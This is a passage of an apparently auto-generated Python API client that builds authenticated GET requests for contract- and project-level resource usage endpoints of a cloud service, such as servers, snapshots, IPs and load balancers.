:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: ServersUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method contract_level_server_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `contract_level_server_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/contracts/usage/servers', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ServersUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def contract_level_snapshot_usage_get(self, from_time, **kwargs): # noqa: E501
"""get contract level snapshot usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_snapshot_usage_get(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: SnapshotsUsages
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.contract_level_snapshot_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
else:
(data) = self.contract_level_snapshot_usage_get_with_http_info(from_time, **kwargs) # noqa: E501
return data
def contract_level_snapshot_usage_get_with_http_info(self, from_time, **kwargs): # noqa: E501
"""get contract level snapshot usage # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.contract_level_snapshot_usage_get_with_http_info(from_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str from_time: Starting time when the usage should be calculated (required)
:param str to_time: End time when the usage should be calculated
:param str without_deleted: To calculate the usage with or without deleted resources
:param str interval_variable:
:return: SnapshotsUsages
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method contract_level_snapshot_usage_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'from_time' is set
if ('from_time' not in params or
params['from_time'] is None):
raise ValueError("Missing the required parameter `from_time` when calling `contract_level_snapshot_usage_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'from_time' in params:
query_params.append(('from_time', params['from_time'])) # noqa: E501
if 'to_time' in params:
query_params.append(('to_time', params['to_time'])) # noqa: E501
if 'without_deleted' in params:
query_params.append(('without_deleted', params['without_deleted'])) # noqa: E501
if 'interval_variable' in params:
query_params.append(('interval_variable', params['interval_variable'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_Token', 'User_UUID'] # noqa: E501
return self.api_client.call_api(
'/contracts/usage/snapshots', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotsUsages', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def contract_level_storage_backup_usage_get(self, from_time, **kwargs):  # noqa: E501
    """get contract level storage backup usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.contract_level_storage_backup_usage_get(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: StorageBackupUsages
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this convenience wrapper always want the deserialized
    # payload rather than the full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The _with_http_info variant already returns the right object for
    # both modes — a request thread when async_req is set, the response
    # data otherwise — so its result is handed back unchanged.
    return self.contract_level_storage_backup_usage_get_with_http_info(from_time, **kwargs)  # noqa: E501
def contract_level_storage_backup_usage_get_with_http_info(self, from_time, **kwargs):  # noqa: E501
    """get contract level storage backup usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.contract_level_storage_backup_usage_get_with_http_info(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: StorageBackupUsages
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint accepts: its query parameters plus
    # the generic request-control options.
    all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Collect the provided arguments, rejecting anything unknown.
    # Iterating kwargs directly replaces the fragile locals()/
    # six.iteritems() pattern; dict.items() behaves identically on
    # Python 2 and 3, so the six dependency is not needed here.
    params = {'from_time': from_time}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method contract_level_storage_backup_usage_get" % key
            )
        params[key] = val

    # verify the required parameter 'from_time' is set
    if params.get('from_time') is None:
        raise ValueError("Missing the required parameter `from_time` when calling `contract_level_storage_backup_usage_get`")  # noqa: E501

    collection_formats = {}
    path_params = {}

    # Build the query string from whichever parameters were supplied.
    query_params = []
    for name in ('from_time', 'to_time', 'without_deleted', 'interval_variable'):
        if name in params:
            query_params.append((name, params[name]))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['API_Token', 'User_UUID']  # noqa: E501

    return self.api_client.call_api(
        '/contracts/usage/storage_backups', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='StorageBackupUsages',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def contract_level_template_usage_get(self, from_time, **kwargs):  # noqa: E501
    """get contract level templates usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.contract_level_template_usage_get(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: TemplatesUsages
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this convenience wrapper always want the deserialized
    # payload rather than the full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The _with_http_info variant already returns the right object for
    # both modes — a request thread when async_req is set, the response
    # data otherwise — so its result is handed back unchanged.
    return self.contract_level_template_usage_get_with_http_info(from_time, **kwargs)  # noqa: E501
def contract_level_template_usage_get_with_http_info(self, from_time, **kwargs):  # noqa: E501
    """get contract level templates usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.contract_level_template_usage_get_with_http_info(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: TemplatesUsages
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint accepts: its query parameters plus
    # the generic request-control options.
    all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Collect the provided arguments, rejecting anything unknown.
    # Iterating kwargs directly replaces the fragile locals()/
    # six.iteritems() pattern; dict.items() behaves identically on
    # Python 2 and 3, so the six dependency is not needed here.
    params = {'from_time': from_time}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method contract_level_template_usage_get" % key
            )
        params[key] = val

    # verify the required parameter 'from_time' is set
    if params.get('from_time') is None:
        raise ValueError("Missing the required parameter `from_time` when calling `contract_level_template_usage_get`")  # noqa: E501

    collection_formats = {}
    path_params = {}

    # Build the query string from whichever parameters were supplied.
    query_params = []
    for name in ('from_time', 'to_time', 'without_deleted', 'interval_variable'):
        if name in params:
            query_params.append((name, params[name]))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['API_Token', 'User_UUID']  # noqa: E501

    return self.api_client.call_api(
        '/contracts/usage/templates', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='TemplatesUsages',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def contract_level_usage_get(self, from_time, **kwargs):  # noqa: E501
    """get contract level usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.contract_level_usage_get(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: UsageGetResponseOverview
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this convenience wrapper always want the deserialized
    # payload rather than the full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The _with_http_info variant already returns the right object for
    # both modes — a request thread when async_req is set, the response
    # data otherwise — so its result is handed back unchanged.
    return self.contract_level_usage_get_with_http_info(from_time, **kwargs)  # noqa: E501
def contract_level_usage_get_with_http_info(self, from_time, **kwargs):  # noqa: E501
    """get contract level usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.contract_level_usage_get_with_http_info(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: UsageGetResponseOverview
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint accepts: its query parameters plus
    # the generic request-control options.
    all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Collect the provided arguments, rejecting anything unknown.
    # Iterating kwargs directly replaces the fragile locals()/
    # six.iteritems() pattern; dict.items() behaves identically on
    # Python 2 and 3, so the six dependency is not needed here.
    params = {'from_time': from_time}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method contract_level_usage_get" % key
            )
        params[key] = val

    # verify the required parameter 'from_time' is set
    if params.get('from_time') is None:
        raise ValueError("Missing the required parameter `from_time` when calling `contract_level_usage_get`")  # noqa: E501

    collection_formats = {}
    path_params = {}

    # Build the query string from whichever parameters were supplied.
    query_params = []
    for name in ('from_time', 'to_time', 'without_deleted', 'interval_variable'):
        if name in params:
            query_params.append((name, params[name]))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['API_Token', 'User_UUID']  # noqa: E501

    return self.api_client.call_api(
        '/contracts/usage', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='UsageGetResponseOverview',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def project_level_distributed_storage_usage_get(self, from_time, **kwargs):  # noqa: E501
    """get project level rocket storage usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.project_level_distributed_storage_usage_get(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: DistributedStoragesUsages
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this convenience wrapper always want the deserialized
    # payload rather than the full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The _with_http_info variant already returns the right object for
    # both modes — a request thread when async_req is set, the response
    # data otherwise — so its result is handed back unchanged.
    return self.project_level_distributed_storage_usage_get_with_http_info(from_time, **kwargs)  # noqa: E501
def project_level_distributed_storage_usage_get_with_http_info(self, from_time, **kwargs):  # noqa: E501
    """get project level rocket storage usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.project_level_distributed_storage_usage_get_with_http_info(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: DistributedStoragesUsages
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint accepts: its query parameters plus
    # the generic request-control options.
    all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Collect the provided arguments, rejecting anything unknown.
    # Iterating kwargs directly replaces the fragile locals()/
    # six.iteritems() pattern; dict.items() behaves identically on
    # Python 2 and 3, so the six dependency is not needed here.
    params = {'from_time': from_time}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method project_level_distributed_storage_usage_get" % key
            )
        params[key] = val

    # verify the required parameter 'from_time' is set
    if params.get('from_time') is None:
        raise ValueError("Missing the required parameter `from_time` when calling `project_level_distributed_storage_usage_get`")  # noqa: E501

    collection_formats = {}
    path_params = {}

    # Build the query string from whichever parameters were supplied.
    query_params = []
    for name in ('from_time', 'to_time', 'without_deleted', 'interval_variable'):
        if name in params:
            query_params.append((name, params[name]))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['API_Token', 'User_UUID']  # noqa: E501

    return self.api_client.call_api(
        '/projects/usage/distributed_storages', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='DistributedStoragesUsages',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def project_level_ip_usage_get(self, from_time, **kwargs):  # noqa: E501
    """get project level ip usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.project_level_ip_usage_get(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: IpsUsages
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this convenience wrapper always want the deserialized
    # payload rather than the full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The _with_http_info variant already returns the right object for
    # both modes — a request thread when async_req is set, the response
    # data otherwise — so its result is handed back unchanged.
    return self.project_level_ip_usage_get_with_http_info(from_time, **kwargs)  # noqa: E501
def project_level_ip_usage_get_with_http_info(self, from_time, **kwargs):  # noqa: E501
    """get project level ip usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.project_level_ip_usage_get_with_http_info(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: IpsUsages
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint accepts: its query parameters plus
    # the generic request-control options.
    all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Collect the provided arguments, rejecting anything unknown.
    # Iterating kwargs directly replaces the fragile locals()/
    # six.iteritems() pattern; dict.items() behaves identically on
    # Python 2 and 3, so the six dependency is not needed here.
    params = {'from_time': from_time}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method project_level_ip_usage_get" % key
            )
        params[key] = val

    # verify the required parameter 'from_time' is set
    if params.get('from_time') is None:
        raise ValueError("Missing the required parameter `from_time` when calling `project_level_ip_usage_get`")  # noqa: E501

    collection_formats = {}
    path_params = {}

    # Build the query string from whichever parameters were supplied.
    query_params = []
    for name in ('from_time', 'to_time', 'without_deleted', 'interval_variable'):
        if name in params:
            query_params.append((name, params[name]))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['API_Token', 'User_UUID']  # noqa: E501

    return self.api_client.call_api(
        '/projects/usage/ip_addresses', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='IpsUsages',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def project_level_isoimage_usage_get(self, from_time, **kwargs):  # noqa: E501
    """get project level iso images usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.project_level_isoimage_usage_get(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: IsoimagesUsages
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this convenience wrapper always want the deserialized
    # payload rather than the full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The _with_http_info variant already returns the right object for
    # both modes — a request thread when async_req is set, the response
    # data otherwise — so its result is handed back unchanged.
    return self.project_level_isoimage_usage_get_with_http_info(from_time, **kwargs)  # noqa: E501
def project_level_isoimage_usage_get_with_http_info(self, from_time, **kwargs):  # noqa: E501
    """get project level iso images usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.project_level_isoimage_usage_get_with_http_info(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: IsoimagesUsages
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint accepts: its query parameters plus
    # the generic request-control options.
    all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Collect the provided arguments, rejecting anything unknown.
    # Iterating kwargs directly replaces the fragile locals()/
    # six.iteritems() pattern; dict.items() behaves identically on
    # Python 2 and 3, so the six dependency is not needed here.
    params = {'from_time': from_time}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method project_level_isoimage_usage_get" % key
            )
        params[key] = val

    # verify the required parameter 'from_time' is set
    if params.get('from_time') is None:
        raise ValueError("Missing the required parameter `from_time` when calling `project_level_isoimage_usage_get`")  # noqa: E501

    collection_formats = {}
    path_params = {}

    # Build the query string from whichever parameters were supplied.
    query_params = []
    for name in ('from_time', 'to_time', 'without_deleted', 'interval_variable'):
        if name in params:
            query_params.append((name, params[name]))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['API_Token', 'User_UUID']  # noqa: E501

    return self.api_client.call_api(
        '/projects/usage/iso_images', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='IsoimagesUsages',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def project_level_loadbalancer_usage_get(self, from_time, **kwargs):  # noqa: E501
    """get contract load balancers usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.project_level_loadbalancer_usage_get(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: LoadbalancersUsages
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this convenience wrapper always want the deserialized
    # payload rather than the full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The _with_http_info variant already returns the right object for
    # both modes — a request thread when async_req is set, the response
    # data otherwise — so its result is handed back unchanged.
    return self.project_level_loadbalancer_usage_get_with_http_info(from_time, **kwargs)  # noqa: E501
def project_level_loadbalancer_usage_get_with_http_info(self, from_time, **kwargs):  # noqa: E501
    """get contract load balancers usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.project_level_loadbalancer_usage_get_with_http_info(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: LoadbalancersUsages
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint accepts: its query parameters plus
    # the generic request-control options.
    all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Collect the provided arguments, rejecting anything unknown.
    # Iterating kwargs directly replaces the fragile locals()/
    # six.iteritems() pattern; dict.items() behaves identically on
    # Python 2 and 3, so the six dependency is not needed here.
    params = {'from_time': from_time}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method project_level_loadbalancer_usage_get" % key
            )
        params[key] = val

    # verify the required parameter 'from_time' is set
    if params.get('from_time') is None:
        raise ValueError("Missing the required parameter `from_time` when calling `project_level_loadbalancer_usage_get`")  # noqa: E501

    collection_formats = {}
    path_params = {}

    # Build the query string from whichever parameters were supplied.
    query_params = []
    for name in ('from_time', 'to_time', 'without_deleted', 'interval_variable'):
        if name in params:
            query_params.append((name, params[name]))  # noqa: E501

    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['API_Token', 'User_UUID']  # noqa: E501

    return self.api_client.call_api(
        '/projects/usage/load_balancers', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='LoadbalancersUsages',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def project_level_paas_service_usage_get(self, from_time, **kwargs):  # noqa: E501
    """get contract paas services usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.project_level_paas_service_usage_get(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: PaasServicesUsages
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this convenience wrapper always want the deserialized
    # payload rather than the full (data, status, headers) tuple.
    kwargs['_return_http_data_only'] = True
    # The _with_http_info variant already returns the right object for
    # both modes — a request thread when async_req is set, the response
    # data otherwise — so its result is handed back unchanged.
    return self.project_level_paas_service_usage_get_with_http_info(from_time, **kwargs)  # noqa: E501
def project_level_paas_service_usage_get_with_http_info(self, from_time, **kwargs):  # noqa: E501
    """get contract paas services usage  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.project_level_paas_service_usage_get_with_http_info(from_time, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str from_time: Starting time when the usage should be calculated (required)
    :param str to_time: End time when the usage should be calculated
    :param str without_deleted: To calculate the usage with or without deleted resources
    :param str interval_variable:
    :return: PaasServicesUsages
             If the method is called asynchronously,
             returns the request thread.
    """
    # Keyword arguments this endpoint accepts: its query parameters plus
    # the generic request-control options.
    all_params = ['from_time', 'to_time', 'without_deleted', 'interval_variable']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Collect the provided arguments, rejecting anything unknown.
    # Iterating kwargs directly replaces the fragile locals()/
    # six.iteritems() pattern; dict.items() behaves identically on
